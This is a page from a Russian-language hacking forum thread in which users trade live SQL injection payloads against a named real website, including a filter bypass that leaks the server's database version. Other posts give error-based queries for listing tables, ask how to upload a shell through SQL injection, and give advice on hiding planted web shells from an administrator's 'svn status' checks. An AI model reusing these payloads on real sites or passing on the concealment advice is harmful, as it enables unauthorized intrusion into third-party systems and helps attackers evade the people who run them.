HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1815 из 2438 « Первая < 8151315171517651805 1811 1812 1813 1814 1815 1816 1817 1818 1819 1825186519152315 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #18141  
Старый 19.09.2011, 04:09
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
На серве стоит svn и админ почти ежедневно им пользуется. Мои шеллы и изменения на раз палятся командой

svn status

Как скрыться?

пробовал svn add /path/to/shell.php (Вроде добавляет файл в снимок файловой системы)

Все равно status показывает мои изменения.
 
Ответить с цитированием

  #18142  
Старый 19.09.2011, 10:04
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию
Цитата:
Сообщение от попугай  
попугай said:
На серве стоит svn и админ почти ежедневно им пользуется. Мои шеллы и изменения на раз палятся командой
svn status
Как скрыться?
пробовал svn add /path/to/shell.php (Вроде добавляет файл в снимок файловой системы)
Все равно status показывает мои изменения.
Не уверен на 100%, но

Сделать отдельную бранчу, в этой бранче сделать коммит шелла. В логах транка не должны светиться сие действия. Для верности в бранче сделать изменения во всех файлах (добавить по одной строке) и коммитить не шелл, а добавить строку выполнения команды.
 
Ответить с цитированием

  #18143  
Старый 19.09.2011, 17:56
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию
собственно вопрос как узнать префикс таблиц в joomla? попалась инъекция mysql4 дефолтный jos не катит...
 
Ответить с цитированием

  #18144  
Старый 19.09.2011, 18:35
jawbreaker
Участник форума
Регистрация: 07.07.2008
Сообщений: 161
Провел на форуме:
1027635

Репутация: 234
По умолчанию
Что можно сделать если есть вот такая sql injection:

Код:
Code:
http://mirplombir.ru/index.php?searchstring=1\\%27%29%29or%28SELECT%28COUNT%28*%29%29FR%20%20OM%28%28SELECT%281%29%29UNION%28SELECT%282%29%29UNION%28SELECT%283%29%29%29x/**/GROUP/**/BY/**/MID%28VERSION%28%29,FLOOR%28RAND%280%29*2%29,64%29%29%23%20UNION%20SELECT%201%20--%20%20%27
При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано

Цитата:
Сообщение от None  
Запрос небезопасен и был отвергнут.
 
Ответить с цитированием

  #18145  
Старый 19.09.2011, 19:32
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от jawbreaker  
jawbreaker said:
Что можно сделать если есть вот такая sql injection:
Код:
Code:
http://mirplombir.ru/index.php?searchstring=1\\%27%29%29or%28SELECT%28COUNT%28*%29%29FR%20%20OM%28%28SELECT%281%29%29UNION%28SELECT%282%29%29UNION%28SELECT%283%29%29%29x/**/GROUP/**/BY/**/MID%28VERSION%28%29,FLOOR%28RAND%280%29*2%29,64%29%29%23%20UNION%20SELECT%201%20--%20%20%27
При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано
Попробовать здесь.

Цитата:
Сообщение от None  
http://mirplombir.ru/index.php?news=2'and(select*from(select(name_const (version(),1)),name_const(version(),1))a)and'
Duplicate column name '5.1.50-lk-log'
 
Ответить с цитированием

  #18146  
Старый 20.09.2011, 01:22
sourcec0de
Guest
Сообщений: n/a
Провел на форуме:
10040

Репутация: 7
По умолчанию
Цитата:
Сообщение от er9j6@  
er9j6@ said:
Попробовать здесь.
Код:
Code:
http://mirplombir.ru/index.php?news=2'and(select*from(select(name_const (version(),1)),name_const(version(),1))a)and'
Duplicate column name '5.1.50-lk-log'
name_const здесь не надо использовать в связи с ее особенностями на разных версиях маскула. Кроме констант ты ничего не выведешь, да и вопрос состоял в другом, а именно

Цитата:
Сообщение от jawbreaker  
jawbreaker said:
При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано
Код:
Code:
Запрос небезопасен и был отвергнут.
Это фильтрация на последовательность union select from

Один из вариантов обхода

Код:
Code:
http://mirplombir.ru/index.php?news=2'and(0)union%0Aselect+version(),2,3+from+information_schema.tables--+
 
Ответить с цитированием

  #18147  
Старый 20.09.2011, 08:03
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию
Удачно подобрал нужную таблицу в PostgreSQL, но вывести колонки не получается.

Запрос: http://www.site.com/index.php?id=246+union+select+column_name+from+inf ormation_schema.columns+where+table_name=chr(106)| |chr(111)||chr(115)||chr(95)||chr(117)||chr(115)|| chr(101)||chr((114)||chr(115) --

Вывод: FUNCTION modx1.chr does not exist

Судя по ошибке двиг "modx" и в нём нету по-умолчанию "char";

Запрос: http://www.site.com/index.php?id=246+union+select+column_name+from+INF ORMATION_SCHEMA.columns+where+TABLE_name=jos_users--

Вывод: Unknown column 'jos_users' in 'where clause'

В чём моя ошибка? Как вывести колонки из таблицы jos_users ?
 
Ответить с цитированием

  #18148  
Старый 20.09.2011, 09:07
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию
попробуй jos_users занести в кавычки или в hex переведи
 
Ответить с цитированием

  #18149  
Старый 20.09.2011, 12:25
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию
Привет, есть вопрос по заливке шелла через error based sqli.

Допустим есть запрос вида:

Код:
Code:
index.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+USER()),floor(rand(0)*2)))+--+
Код:
Code:
Duplicate entry 'root@localhost1' for key 1
Так вывожу имена таблиц:

Код:
Code:


	
Код:

	
?id=1+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat((SELECT+TABLE_NAME+FROM+information_schema.tables+LIMIT+0,1),floor(rand(0)*2)))+--+
Путь известен.

Как действовать дальше?

Да чуть не забыл, соль в том, что mq=on.
 
Ответить с цитированием

  #18150  
Старый 20.09.2011, 13:01
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от fl00der  
fl00der said:
Привет, есть вопрос по заливке шелла через error based sqli.
Допустим есть запрос вида:
Код:
Code:
index.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+USER()),floor(rand(0)*2)))+--+
Код:
Code:
Duplicate entry 'root@localhost1' for key 1
Так вывожу имена таблиц:
Код:
Code:


	
Код:

	
?id=1+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat((SELECT+TABLE_NAME+FROM+information_schema.tables+LIMIT+0,1),floor(rand(0)*2)))+--+
Путь известен.
Как действовать дальше?
Да чуть не забыл, соль в том, что mq=on.
Я на 100% не уверен, если mq=on, залить шелл не удастся
 
Ответить с цитированием
Ответ
Страница 1815 из 2438 « Первая < 8151315171517651805 1811 1812 1813 1814 1815 1816 1817 1818 1819 1825186519152315 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ